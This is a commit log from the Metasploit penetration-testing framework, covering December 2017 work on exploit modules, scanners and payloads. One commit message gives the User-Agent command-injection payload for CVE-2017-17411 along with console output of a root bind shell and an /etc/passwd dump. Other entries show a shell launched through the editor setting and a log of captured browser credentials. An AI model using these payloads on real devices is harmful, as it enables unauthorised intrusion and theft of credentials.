Brent Cook ae17943d4c fix documentation preformat blocks 2017-12-27 22:32:26 -06:00
Brent Cook 6f1196d30c clarify what's happening when there is a connection failure 2017-12-27 22:32:08 -06:00
james fad4ccece9 Only use basic auth in couchdb_enum when credentials are provided 2017-12-27 20:16:01 -06:00
Jon Hart bbed7db13c Merge branch 'upstream-master' into feature/mqtt-login 2017-12-27 13:08:44 -08:00
Jeffrey Martin 8ea50572df Land #9329, Add basic framework for interacting with MQTT 2017-12-27 14:59:34 -06:00
Tod Beardsley e6de25d63b Land #9316 Cambium modules and mixins, tx @juushya
These cover several of the CVEs mentioned in

https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/
2017-12-26 12:39:51 -06:00
Tod Beardsley 1bb2bb9d2c Oops, no admin in that path 2017-12-26 12:06:45 -06:00
Tod Beardsley 9af88681a2 Move deprecation out 60 days 2017-12-26 11:56:47 -06:00
juushya 8b0f2214b1 few more updates 2017-12-23 03:04:11 +05:30
b0yd 7aa296577e Added readme 2017-12-22 14:34:35 -05:00
juushya 038119d9df Use of get_cookies_parsed, changing dirs, marking deprecated in 2 mods, more 2017-12-23 00:14:27 +05:30
Jon Hart d4bc98c13f Merge branch 'upstream-master' into feature/mqtt-login 2017-12-22 08:07:40 -08:00
b0yd ec7625af9f Damn spaces... 2017-12-22 10:57:11 -05:00
b0yd 2b33b88fa4 Damn spaces 2017-12-22 10:54:31 -05:00
b0yd e088c95a99 Module Cleanup 2017-12-22 10:51:01 -05:00
Tod Beardsley 674397fa06 Merge pull request #19 from jhart-r7/pr/9316
Correct permissions, fixing warning
2017-12-22 09:45:43 -06:00
Jon Hart b29948412e Correct permissions, fixing warning 2017-12-22 07:27:11 -08:00
b0yd d657a9dc53 Commvault Remote Command Injection 2017-12-22 10:04:13 -05:00
headlesszeke 3dfb836768 Ranking upgrade and uses agent key instead of manually setting user-agent in headers 2017-12-21 23:10:26 -06:00
headlesszeke b31ac73996 Ensure vulnerability check cannot false positive with the power of runtime randomness 2017-12-21 22:53:46 -06:00
William Vu dc2b5df2ef Update LICENSE for mysql_udf_payload 2017-12-21 21:03:22 -06:00
William Vu caae33b417 Land #9170, Linux UDF for mysql_udf_payload 2017-12-21 20:48:24 -06:00
headlesszeke 8c3836cc88 Removed msf/core require statement and extraneous debug message 2017-12-21 19:55:56 -06:00
juushya a86abb0297 Implemented get_cookies_parsed 2017-12-22 05:36:36 +05:30
headlesszeke 96cff8b615 Merge pull request #1 from headlesszeke/headlesszeke-cve-2017-17411
Adds exploit module for CVE-2017-17411
2017-12-21 17:51:35 -06:00
headlesszeke 2ee42e1433 Adds exploit module for CVE-2017-17411
This module is for exploiting vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vuln in question involves a command injection due to improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to `";<payload> #`. This can be verified against WVBR0-25 devices running firmware < 1.0.41.

Example console output:

```
msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth 
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > info

       Name: Linksys WVBR0-25 User-Agent Command Execution
     Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
   Platform: Unix
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-12-13

Provided by:
  HeadlessZeke

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                     yes       The target address
  RPORT    80               yes       The target port
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Payload information:
  Space: 1024

Description:
  The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to 
  connect wireless Genie cable boxes to the Genie DVR, is vulnerable 
  to OS command injection in version < 1.0.41 of the web management 
  portal via the User-Agent header. Authentication is not required to 
  exploit this vulnerability.

References:
  http://cvedetails.com/cve/2017-17411/
  http://www.zerodayinitiative.com/advisories/ZDI-17-973
  https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show payloads 

Compatible Payloads
===================

   Name                     Disclosure Date  Rank    Description
   ----                     ---------------  ----    -----------
   cmd/unix/bind_netcat                      normal  Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/generic                          normal  Unix Command, Generic Command Execution
   cmd/unix/reverse_netcat                   normal  Unix Command Shell, Reverse TCP (via netcat)

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat 
payload => cmd/unix/bind_netcat
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
RHOST => 10.0.0.104
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] Started bind handler
[*] 10.0.0.104:80 - Exploiting...
[*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600
id

uid=0(root) gid=0(root)
^C
Abort session 1? [y/N]  y

[*] 10.0.0.104 - Command shell session 1 closed.  Reason: User exit
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/generic 
payload => cmd/unix/generic
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set cmd cat /etc/passwd
cmd => cat /etc/passwd
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] 10.0.0.104:80 - Exploiting...
[+] 10.0.0.104:80 - Command sent successfully
[*] 10.0.0.104:80 - Command output:  root:x:0:0::/:/bin/sh nobody:x:99:99:Nobody:/:/bin/nologin sshd:x:22:22::/var/empty:/sbin/nologin admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga:x:1001:1001:Quagga
[*] Exploit completed, but no session was created.
msf exploit(linksys_wvbr0_user_agent_exec_noauth) >
```
2017-12-21 17:44:35 -06:00
Metasploit 909caa0425 Bump version of framework to 4.16.27 2017-12-21 13:27:52 -08:00
Brent Cook 9d8cb8a8d0 Merge branch '4.x' into upstream-master 2017-12-21 15:17:38 -06:00
Metasploit ee2f10efc5 Bump version of framework to 4.16.26 2017-12-21 10:04:38 -08:00
Tod Beardsley 5dfb5d581a Switch get_cookies to get_cookies_parsed
Am I doing it right? See #9333
2017-12-21 09:00:56 -06:00
Jon Hart becc05b4f1 Cleaner client_id handling 2017-12-21 06:57:33 -08:00
Jon Hart 157d973194 Merge branch 'feature/mqtt' into feature/mqtt-login 2017-12-20 19:13:34 -08:00
Jon Hart 82bdce683b Remove to_s 2017-12-20 19:13:12 -08:00
Jon Hart adca42f311 Merge branch 'feature/mqtt' into feature/mqtt-login 2017-12-20 19:11:52 -08:00
Jon Hart b78f1105f7 Add missing port 2017-12-20 19:11:33 -08:00
Jon Hart 917e9aa328 Doc READ_TIMEOUT 2017-12-20 19:10:49 -08:00
Jon Hart bedc276225 Merge branch 'feature/mqtt' into feature/mqtt-login 2017-12-20 19:09:51 -08:00
Jon Hart ddb2566f3b Remove duplicate options, set less suspicious client_id 2017-12-20 19:09:35 -08:00
Jon Hart 962bc71d10 Merge branch 'feature/mqtt' into feature/mqtt-login 2017-12-20 18:58:36 -08:00
Jon Hart cf21d13b2e Resolve conflict 2017-12-20 18:58:16 -08:00
Jon Hart 9c0df54f36 syntax 2017-12-20 18:54:09 -08:00
Jon Hart fa1536209a syntax 2017-12-20 18:52:34 -08:00
Jon Hart 508253eadc More docs 2017-12-20 18:51:44 -08:00
Jon Hart 0f72ce1ee5 Add WIP documentation for auxiliary/scanner/mqtt/connect 2017-12-20 18:45:10 -08:00
Jon Hart 298cb16b1a Set default USER/PASS files 2017-12-20 18:44:43 -08:00
Jon Hart 37ae5e1303 Add admin as a default unix passwd 2017-12-20 18:44:21 -08:00
William Vu 1975713a92 Land #9333, get_cookies_parsed using CGI::Cookie 2017-12-20 20:08:33 -06:00
Jon Hart b9af835d06 Style 2017-12-20 18:05:00 -08:00
Jon Hart d0b3abc14b Better handling of MQTT endpoints which don't require authentication
Arguably this is working around LoginScanner's inability to provide
blank usernames AND passwords
2017-12-20 18:02:52 -08:00
Jon Hart 2e62d77e36 Add new method for fetching parsed cookies from an HTTP response
This fixed #9332.
2017-12-20 16:19:44 -08:00
Brent Cook d567c965b0 Land #9331, fix powershell extension, python meterpreter http headers 2017-12-20 16:52:41 -06:00
Brent Cook 24907938bb bump payloads, various fixes 2017-12-20 16:47:37 -06:00
Jon Hart 495c649c7d Better printing 2017-12-20 14:40:42 -08:00
Jon Hart ed5f177fcd syntax 2017-12-20 14:20:08 -08:00
Jon Hart e66ec85677 Set default u/p 2017-12-20 14:18:33 -08:00
Brent Cook 3b78302868 Land #9327, restore transport enum used in TLVs 2017-12-20 16:11:04 -06:00
Brent Cook 5fe9dba4dd Land #9296, add iOS meterpreter support 2017-12-20 16:09:41 -06:00
Brent Cook df4f62cde9 bump to mettle 0.3.3 2017-12-20 15:58:17 -06:00
Jon Hart 7723933fa9 Merge branch 'feature/mqtt' into feature/mqtt-login 2017-12-20 13:42:16 -08:00
Jon Hart 741d08f604 Style cleanup 2017-12-20 13:33:47 -08:00
Jeffrey Martin 8cd7185a7f Land #9313, Add DirectAdmin login_scanner module 2017-12-20 15:23:24 -06:00
Jeffrey Martin 7f8a5d3834 improved credential reporting 2017-12-20 15:09:11 -06:00
Nick Marcoccio 86ce3c8781 Made suggested changes and added documentation 2017-12-20 15:54:16 -05:00
Jon Hart 14c779b945 Fix rubocop warning 2017-12-20 12:44:27 -08:00
Jon Hart ac1daaf10e Fix rubocop warning 2017-12-20 12:41:44 -08:00
Jon Hart b4262662dc Add missing mqtt login helper 2017-12-20 12:33:49 -08:00
Jon Hart c817df0bbc Add module for bruteforcing authentication on MQTT endpoints 2017-12-20 12:30:21 -08:00
Jon Hart 7e91274796 Add module for connecting to/discovering MQTT endpoints 2017-12-20 12:29:50 -08:00
Jon Hart f15309bc48 Add basic framework for interacting with MQTT 2017-12-20 12:28:02 -08:00
Brent Cook a8b845fff9 Land #9283, Add node.js ws websocket library DoS module 2017-12-20 14:20:42 -06:00
Jeffrey Martin 9719ede3f0 restore transport enum used in TLVs 2017-12-20 13:12:24 -06:00
Matthew Kienow 31042d4171 Land #9324, AutoRunScript with resource scripts 2017-12-20 13:52:53 -05:00
Brent Cook 210f137b7b Merge branch 'upstream-master' into land-9296- 2017-12-20 12:07:53 -06:00
Brent Cook 3339c3b74d remove magic, because it causes complications with complex RC scripts 2017-12-20 11:49:42 -06:00
Brent Cook 0c867d92fd fix incorrect regex 2017-12-20 11:46:14 -06:00
Brent Cook 32c486023c Land #9308, Ensure tab completion in HWBridge sessions works 2017-12-20 11:29:11 -06:00
Brent Cook 4568445684 Land #9323, remove OSDB ref 2017-12-20 11:19:35 -06:00
Brent Cook 64d346f2e8 Land #9326, fix clipboard typo 2017-12-20 11:17:32 -06:00
Brent Cook f204da452c Land #9321, use long-enough URL with web_delivery to encode architecture 2017-12-20 10:36:01 -06:00
Puru bfa0cad8a5 Fix clipboard typo 2017-12-20 20:49:36 +05:45
Nick Marcoccio ce457db1e3 fixed spaces at EOL 2017-12-20 09:24:30 -05:00
Nick Marcoccio d6024277fc fixed missing quote 2017-12-20 09:03:32 -05:00
Nick Marcoccio 139afe45a9 Add phpCollab 2.5.1 exploit module 2017-12-20 08:36:58 -05:00
Nick Marcoccio fe15ac3b82 Removed file committed by mistake 2017-12-20 08:27:18 -05:00
Nick Marcoccio fd2a0d3057 Add phpCollab 2.5.1 exploit module 2017-12-20 08:22:01 -05:00
Brent Cook 2629ec6bdb infer whether the user supplied a Meterpreter or resource script 2017-12-20 06:43:20 -06:00
Brent Cook 5ecc45a0d1 nicely handle exceptions when processing scripts, tell the user about them
Let's help the user by saying what's going on.
2017-12-20 06:42:50 -06:00
Brent Cook 05c6079e0d remove unused 'active_resource' accessor 2017-12-20 06:15:09 -06:00
EgiX a4098803b3 Remove OSVDB reference 2017-12-20 13:10:42 +01:00
Tim 15da7c699d Fix #7779, fix multi/meterpreter/reverse_http with web_delivery 2017-12-20 16:32:07 +08:00
Brent Cook 9fb445fbf0 Land #9300, Add private data type to auxiliary scanner ftp_login and telnet_login 2017-12-20 00:30:43 -06:00
Brent Cook 6b216f2a20 Land #9290, Fix OverrideLHOST/LPORT with http/s Meterpreter payloads 2017-12-20 00:26:06 -06:00
Tod Beardsley 216d00e39f Use a random fname destination for /etc/passwd 2017-12-19 17:02:16 -06:00
Tod Beardsley e93282b71d Drop calls to vprint_* 2017-12-19 16:53:02 -06:00
Tod Beardsley 2dc2ac134e Don't default verbose 2017-12-19 16:48:41 -06:00
Jeffrey Martin fe4c701016 Merge released '4.x' 2017-12-19 14:14:22 -06:00
Jon Hart a2c5cc0ffb Remove old deprecated modules 2017-12-19 07:56:16 -08:00
Tod Beardsley 2fa1568151 Get @jhart-r7's fixes for cookie tests 2017-12-19 09:03:51 -06:00
Jon Hart 7b386ea2c8 Fix msftidy warnings wrt Set-Cookie 2017-12-19 06:58:23 -08:00
Nick Marcoccio acc6951bf3 fixed typo 2017-12-19 08:35:11 -05:00
Tim 358aca9435 apple_ios/aarch64/shell_reverse_tcp 2017-12-19 15:42:21 +08:00
Brent Cook 9f144ce8d4 Land #9151, mettle extension support + sniffer module 2017-12-18 21:49:40 -06:00
Metasploit 66b1a555a1 Bump version of framework to 4.16.25 2017-12-18 16:33:25 -08:00
James Barnett 3d76c36511 Land #9314, remove libsodium
Removing libsodium to fix build issues on various platforms
2017-12-18 18:16:23 -06:00
Tod Beardsley 01341aedc1 Land #9180, @RootUp's Samsung Browser SOP module
Also lands #9311, the docs for the same.
2017-12-18 17:44:07 -06:00
Tod Beardsley 8c1f1696af Kill trailing whitespace in docs 2017-12-18 17:35:49 -06:00
Tod Beardsley 4aa480d655 Land #9311, docs for #9180 2017-12-18 17:34:55 -06:00
Tod Beardsley f0df1750de Land #9180
Land @RootUp's Samsung browser SOP module
2017-12-18 17:28:03 -06:00
Tod Beardsley 85350a9645 Add Rapid7 blog references 2017-12-18 17:11:47 -06:00
Tod Beardsley ae4edd65e1 Hard wrap descriptions 2017-12-18 17:03:13 -06:00
Tod Beardsley c2b8d23854 Kill trailing whitespace 2017-12-18 16:56:09 -06:00
Tod Beardsley 6631ec6126 Merge remote-tracking branch 'upstream/master' 2017-12-18 16:48:33 -06:00
Tod Beardsley 65da14c165 Adding docs for modules 2017-12-18 16:47:43 -06:00
Tod Beardsley 72d3592b9c New requires for Cambium mixins 2017-12-18 16:38:18 -06:00
Tod Beardsley 27a324237b Initial commit for Cambium issues from @juushya
Note, these will trigger a bunch of WARNING msftidy messages for setting
cookies directly. This is on purpose.
2017-12-18 16:32:55 -06:00
Jeffrey Martin 04f294bd53 Fix #8972, Remove libsodium until packaged better
Due to issues with packaging for multiple platforms libsodium as an optional dependency for 'rbnacl' is being removed.  Once packaging issue are resolved this will be restored.  This removes support for `ed25519` keys used with ssh for the time being however manual installation of this gem allows user to workaround this limitation.
2017-12-18 15:21:27 -06:00
Jon Hart a33ed82a40 Land #9214, @realoriginal's update to the Cisco SMI scanner to also fetch Cisco IOS configs 2017-12-18 12:22:26 -08:00
jgor 09772cb08a Add negotiate_auth step to login_scanner test 2017-12-18 12:27:11 -06:00
Brent Cook 2a94a4417a bump payloads 2017-12-18 10:01:10 -06:00
Ryan Knell 369d74cdb2 Updating documentation
Added a missing backtick
2017-12-18 10:34:00 -05:00
Nick Marcoccio 6d565b6c33 added author information 2017-12-18 09:18:36 -05:00
Nick Marcoccio be2a3ca270 edited sid comment 2017-12-18 08:18:02 -05:00
William Vu e9b9c80841 Fix #9307, credit to @r0610205 2017-12-18 03:55:01 -06:00
William Vu 76823e9fe6 Land #9183, Jenkins Groovy XStream RCE 2017-12-18 03:38:27 -06:00
William Vu d3638d0487 Land #9154, Tuleap PHP object injection exploit 2017-12-18 03:19:42 -06:00
William Vu 0e2a158abd Fix global var $is_check (make ivar @is_check) 2017-12-18 03:15:33 -06:00
Nick Marcoccio f447fa1a12 Added DirectAdmin Login Utillity 2017-12-17 22:43:37 -05:00
Pearce Barry 880a1d4283 Land #9312, Module acting as a Pyrotechnical Device Deployment Tool (PDT) for Hardware Bridge 2017-12-17 18:32:28 -06:00
Pearce Barry 8344401484 Add docs, minor tweaks. 2017-12-17 18:15:49 -06:00
RootUp 95e2f1da95 Update samsung_browser_sop_bypass.md 2017-12-17 11:02:24 +05:30
RootUp 53a098a7f3 Update samsung_browser_sop_bypass.md 2017-12-16 22:46:29 +05:30
RootUp 6b54fe6775 Create samsung_browser_sop_bypass.md 2017-12-16 22:26:08 +05:30
RootUp 917dd8e846 Update samsung_browser_sop_bypass.rb 2017-12-16 22:10:02 +05:30
RootUp 8f91377acb Update samsung_browser_sop_bypass.rb 2017-12-16 22:09:21 +05:30
RootUp 88a21d14f8 Merge pull request #3 from todb-r7/pr-9180
Thanks @todb-r7 works perfect !
2017-12-16 22:04:33 +05:30
Brent Cook 90b97d6581 Merge branch 'upstream-master' into land-9151- 2017-12-15 14:15:14 -06:00
Brent Cook 36a3088a67 Land #9303, allow arguments to the editor with the 'edit' command 2017-12-15 13:46:15 -06:00
Pearce Barry 084dc4470d Ensure tab completion in HWBridge sessions works as expected. 2017-12-15 12:19:26 -06:00
William Vu 0a1eea9860 Allow local_editor in cmd_edit to take arguments
Such as vim -i NONE. This may allow command injection via arguments.
However, you can already start an arbitrary program by setting
LocalEditor or escaping the editor.

msf > setg LocalEditor /bin/sh
LocalEditor => /bin/sh
msf > edit -i
[*] Launching /bin/sh -i
$
2017-12-14 19:51:57 -06:00
jgor 563cb6f18f Update method name in test 2017-12-14 17:17:41 -06:00
Tod Beardsley 3b3b0e6e96 And this is why I hate using single quotes
Also, restored the store_cred call.

This will fix up RootUp/metasploit-framework#3 for PR #9180
2017-12-14 14:28:25 -06:00
William Webb 234ef5627e Land #9299, Add arch to MS17-010 detection 2017-12-14 12:20:56 -08:00
jgor 0b3a5567a4 Add module for CVE-2017-13872 iamroot remote exploit via ARD (VNC) 2017-12-14 13:59:35 -06:00
jgor b99f044de5 Implement VNC security type 30 (Apple Remote Desktop) authentication 2017-12-14 13:57:38 -06:00
Metasploit be4f9236f2 Bump version of framework to 4.16.24 2017-12-14 10:08:05 -08:00
bwatters-r7 9ea7747a5c Land #9233, Fix #9232 corruption of non-latin characters in W methods
Merge branch 'land-9233' into upstream-master
2017-12-14 11:54:36 -06:00
Pearce Barry 048b39ccd6 Initial commit of pdt module. 2017-12-14 09:23:21 -06:00
nromsdahl 384b250659 Add credential data type
Added credential data type so that successful passwords are stored in the database and accessible via the creds command.
2017-12-14 08:07:59 -06:00
nromsdahl be4939b56a Add credential data type
Added credential data type so a successful ftp login stores the password in the database to be accessed later by the creds command.
2017-12-14 08:05:57 -06:00
nromsdahl e435dceb26 Merge pull request #1 from rapid7/master
Update from Original
2017-12-14 07:49:23 -06:00
William Vu 3cd287ddd6 Update the MS17-010 scanner to use dcerpc_getarch 2017-12-14 02:08:30 -06:00
William Vu 8e4b007edc Move verify_arch to dcerpc_getarch
We can use this code elsewhere, such as the MS17-010 scanner.
2017-12-14 02:08:25 -06:00
Brent Cook c6a2ae2551 Land #9248, Add wd_mycloud_multiupload_upload exploit 2017-12-13 18:51:02 -06:00
Brent Cook 125a079fa9 add cve reference 2017-12-13 18:50:21 -06:00
h00die d7ad443be1 Merge branch 'master' of https://github.com/rapid7/metasploit-framework into upstream-master 2017-12-13 19:33:05 -05:00
h00die c0a534140d Land #9284 a regex dos for ua_parser_js npm module 2017-12-13 19:31:49 -05:00
h00die 544e4e3d0b fix md formatting 2017-12-13 19:30:50 -05:00
Wei Chen deacebc46b Land #9264, Add private type when storing SSH password
Land #9264
2017-12-13 18:24:31 -06:00
Wei Chen cfec0f4965 Land #9282, Add exploit for MSFT Office DDR in RTF format
Land #9282
2017-12-13 18:16:04 -06:00
Tod Beardsley 5226181d6d Better conditionals from @bcoles 2017-12-13 16:48:05 -06:00
Tod Beardsley 966060d470 Nits picked by @bcoles: commas, quotes, and <head> 2017-12-13 16:38:17 -06:00
Nicholas Starke dd5532c5de Addressing Formatting Issues
There were several formatting and layout issues
that are fixed in this commit.  Also changing
`RHOSTS` to `RHOST`.
2017-12-13 14:26:27 -06:00
Wei Chen b99663fb6c Bring #9282 up to date with upstream-master 2017-12-13 13:16:30 -06:00
RootUp f0fc1bcecd Merge pull request #2 from todb-r7/pr-9180
Hi @todb-r7 
This works perfect in we can save creds in our MSF `creds`
2017-12-13 11:13:42 +05:30
Wei Chen 37514eec17 Land #9234, Add exploit for ClickJacking vuln for pfSense
Land #9234
2017-12-12 14:56:21 -06:00
Wei Chen c7019e5aee Only load files once 2017-12-12 14:54:49 -06:00
Tod Beardsley f18f90e7e4 Merge remote-tracking branch 'upstream/master' 2017-12-12 14:48:58 -06:00
Tod Beardsley 622050ddfc Oops, leftover comment 2017-12-12 14:48:00 -06:00
Tod Beardsley efa46efb48 Actually save creds, or fail through sanely
This incidentally also allows for a custom collector to be implemented
by the user -- for example, if they'd rather pick up a session ID or
inject a browser hook or something along those lines. It's a little
clunky, using the advanced option of CUSTOM_JS, but it seems to work
fine.
2017-12-12 14:06:18 -06:00
Wei Chen 6149f51273 Land #9256, Add aux module to discover WSDD enabled devices
Land #9256
2017-12-12 11:55:42 -06:00
Wei Chen fdd4fc1c41 Land #9292, fix variable name to store the username
Land #9292
2017-12-12 11:21:33 -06:00
Tim c4e20e01e3 iOS meterpreter 2017-12-12 23:23:21 +08:00
RootUp 5f70199218 Update samsung_browser_sop_bypass.rb 2017-12-12 15:52:55 +05:30
Brent Cook 3f6846c332 update payloads with python retry fix 2017-12-12 03:13:38 -06:00
Brent Cook f7dfba6bae deduplicate code from python meterpreter 2017-12-12 03:12:36 -06:00
Brent Cook b7c231bb93 further normalize transport config 2017-12-12 03:12:36 -06:00
Brent Cook bb5ea540ab fix a number of TODO's in the HTTP handler, remove duplication in handlers 2017-12-12 03:12:36 -06:00
Brent Cook 528a423fc0 fix python override scheme 2017-12-12 03:12:36 -06:00
Brent Cook f49006222c remove unneeded uri 2017-12-12 03:12:36 -06:00
Brent Cook 8e76c4cb4f handle override at the meterpreter config layer 2017-12-12 03:12:36 -06:00
Brent Cook 636b93b026 minor simplification 2017-12-12 03:12:36 -06:00
Brent Cook 017374be71 pass lhost/lport back into generate_stage with reverse_http/s 2017-12-12 03:12:36 -06:00
securekomodo b335cacfc1 Update wp_slideshowgallery_upload.rb
Variable on line 67 needs to be changed to "user" from "username" which was undefined and causing error during exploit execution.

[-] Exploit failed: NameError undefined local variable or method `username' for #<Msf::Modules::Mod6578706c6f69742f756e69782f7765626170702f77705f736c69646573686f7767616c6c6572795f75706c6f6164::MetasploitModule:0x0055c61ab093f8>

After changing the incorrect variable name from "username" to "user", the exploit completes.
2017-12-12 00:33:28 -05:00
Matthew Kienow d79b0ad981 Land #9286, Advantech WebAccess webvrpcs BOF RCE 2017-12-12 00:25:56 -05:00
mr_me e7a2dd2e71 fixed email 2017-12-11 23:20:46 -06:00
mr_me 26e2eb8f1a Changed to good ranking 2017-12-11 23:14:36 -06:00
Pearce Barry 7f93cca446 Land #9288, Add Dup Scout Enterprise login buffer overflow 2017-12-11 17:12:20 -06:00
Pearce Barry 9a6c54840b Minor tweak to use vprint... 2017-12-11 16:48:47 -06:00
Nicholas Starke 2d23054a1f Changes as per comments
A few things were changed as per the PR comments:
1) The module title was reworded
2) The module description was multi-lined
3) Negative logic was rewritten to use 'unless'
4) Strings which did not require interpolation were rewritten
5) Documentation markdown was added.
2017-12-11 14:11:40 -06:00
mr_me f8977ed72c added some fixes 2017-12-11 11:34:17 -06:00
Ryan Knell c5f218c84c Addressing comments
1. Updated documentation
2. Made the Sec-WebSocket-Key header a random value
2017-12-11 11:49:31 -05:00
Brent Cook 63b5bb3dea Land #9126, Add android advanced options 2017-12-11 04:11:44 -06:00
Brent Cook 602335abf1 bump payloads 2017-12-11 04:11:21 -06:00
Brent Cook 1653e31f71 Merge branch 'upstream-master' into land-9126- 2017-12-11 03:57:00 -06:00
RootUp 03781e920c Merge pull request #1 from todb-r7/pr-9180
Hi @todb-r7 
By setting TARGET_URL to `www.google.com`  the module works, but in vulnerable browser the address bar would display like `http://192.168.1.102:9090/www.google.com` 

`
msf auxiliary(samsung_browser_sop_bypass) > 
[*] Using URL: http://192.168.1.102:9090/
[*] Server started.
[*] 192.168.1.100: Request 'GET /'
[*] 192.168.1.100: Attempting to spoof origin for www.google.com
[*] 192.168.1.100: Request 'GET /favicon.ico'
[*] 192.168.1.100: Attempting to spoof origin for www.google.com
[*] 192.168.1.100: Request 'GET /www.google.com'
[*] 192.168.1.100: Attempting to spoof origin for www.google.com
[*] 192.168.1.100: Request 'GET /favicon.ico'
[*] 192.168.1.100: Attempting to spoof origin for www.google.com
[*] 192.168.1.100: Request 'GET /favicon.ico'
[*] 192.168.1.100: Attempting to spoof origin for www.google.com
[+] 192.168.1.100: Collected credential for 'www.google.com' test:test
`
2017-12-10 11:57:04 +05:30
William Vu bbbe48efbb Land #9289, typo fix for sysgauge_client_bof.md 2017-12-09 19:37:13 -06:00
Chris Higgins 3a14ac3b37 Fixed a spelling error in documentation 2017-12-09 02:30:42 -06:00
Chris Higgins e91830efe7 Add Dup Scout Enterprise login buffer overflow 2017-12-09 02:20:05 -06:00
Ryan Knell 668585a1f9 Adding documentation
Adding module documentation for ws_dos.
2017-12-08 15:52:57 -05:00
Tod Beardsley cba5c7cb0f Rename to actually call out the browser name 2017-12-08 13:53:13 -06:00
Tod Beardsley 0a9dcafb77 Actually collect the creds, sort of
Instead of an alert() (which the attacker won't see), this collects the
offered credentials in a POST action, and displays them in the console.

This should further store the creds somewhere handy, but this is good
enough for now for testing from @RootUp
2017-12-08 13:51:02 -06:00
Tod Beardsley aee883a706 Fixed up description to be descriptive 2017-12-08 12:24:58 -06:00
Metasploit 348cbe54b6 Bump version of framework to 4.16.23 2017-12-08 10:01:55 -08:00
Tod Beardsley 61a8c2456d Merge remote-tracking branch 'upstream/master' 2017-12-08 11:42:24 -06:00
Pearce Barry 604b949e23 Updated per review comments. 2017-12-08 10:42:43 -06:00
Brent Cook 378f11d859 Land #9279, add docker pull badge to readme 2017-12-07 21:53:35 -06:00
Pearce Barry 7aef0f249e Per MS-2916, load Mettle extensions via new API. 2017-12-07 20:40:22 -06:00
mr_me 34ef650b0d fixed up msftidy, opps. 2017-12-07 17:03:39 -06:00
mr_me 073ffcb3bc added some docs 2017-12-07 16:58:14 -06:00
mr_me 75a82b3fe7 Advantech WebAccess webvrpcs ViewDll1 Stack-based Buffer Overflow Remote Code Execution Vulnerability 2017-12-07 16:34:26 -06:00
Austin 900f7d6f69 docs on options 2017-12-07 14:47:40 -05:00
Austin 5a81f8091d change some options for somethinf for sensible 2017-12-07 14:44:36 -05:00
Adam Cammack 5b5ac878cc Land #9285, Handle IPv6 addresses in full_uri 2017-12-07 13:25:05 -06:00
Austin 335cc13cab remove option, advanced Message seems to break it. 2017-12-07 14:17:14 -05:00
William Vu 2565ad6a27 Handle IPv6 addresses in full_uri (add brackets) 2017-12-07 12:56:55 -06:00
Austin 7bdc99a153 Fix HANDLER + some default options! 2017-12-07 13:53:39 -05:00
Nicholas Starke 306c5d20d9 Adding ua_parser_js ReDoS Module
"ua-parser-js" is an npm module for parsing browser
user-agent strings.  Vulnerable version of this module
have a problematic regular expression that can be exploited
to cause the entire application processing thread to "pause"
as it tries to apply the regular expression to the input.
This is problematic for single-threaded application environments
such as nodejs.  The end result is a denial of service
condition for vulnerable applications, where no further
requests can be processed.
2017-12-07 10:25:29 -06:00
Ryan Knell c992837f0d Adding ws DoS module
This module verifies if ws is vulnerable
to DoS by sending a request to the server
containing a specific header value.
ws is a npm module which handles websockets.
2017-12-07 10:45:57 -05:00
Austin 09aa433fdc Add MESSAGE field for "obfuscation" 2017-12-07 08:04:31 -05:00
William Vu 0a0d24d8f8 Land #9276, cleanup of crufty code 2017-12-07 00:43:27 -06:00
Austin 12425d962c Rename office_dde_delivery to office_dde_delivery.md 2017-12-06 22:40:57 -05:00
Austin 8bb6a8f47c Rename office_dde_delivery to office_dde_delivery.rb 2017-12-06 22:40:37 -05:00
Austin 1e4b707a60 MS Office DDE Documentation 2017-12-06 21:46:47 -05:00
Austin 9d11c60d88 Office DDE Payload Delivery
Generate / Inject existing RTF files with DDE Payloads!
2017-12-06 21:41:00 -05:00
Christian Mehlmauer 912fbc3b8c add docker pull badge to readme 2017-12-06 20:34:40 +01:00
Jeffrey Martin cf4d9130a9 add initial module automation tests 2017-12-05 11:19:24 -06:00
Brent Cook ce2db3cd87 Land #9275, CVE-2017-11882 (docs fix) 2017-12-05 10:16:54 -06:00
Brent Cook c15f379343 remove some unneeded backward-compat code 2017-12-04 22:27:21 -06:00
Austin 14226c5f33 missing docs on options
Missed fixes on documentation
2017-12-04 20:58:36 -05:00
William Webb 04b57f82e8 Land #9274, Remove spaces from EOL 2017-12-04 17:11:06 -08:00
William Webb adba277be0 axe errant spaces at EOL 2017-12-04 16:57:48 -08:00
William Webb 69b01d26bb Land #9226, Microsoft Office OLE object memory corruption 2017-12-04 16:50:27 -08:00
William Vu 19b37c7070 Land #9263, drb_remote_codeexec fixes
See pull requests #7531 and #7749 for hysterical raisins.
2017-12-04 18:45:03 -06:00
Brent Cook 3cf1ffeb5f Land #9273, add authors to osx local root exploit 2017-12-04 18:42:23 -06:00
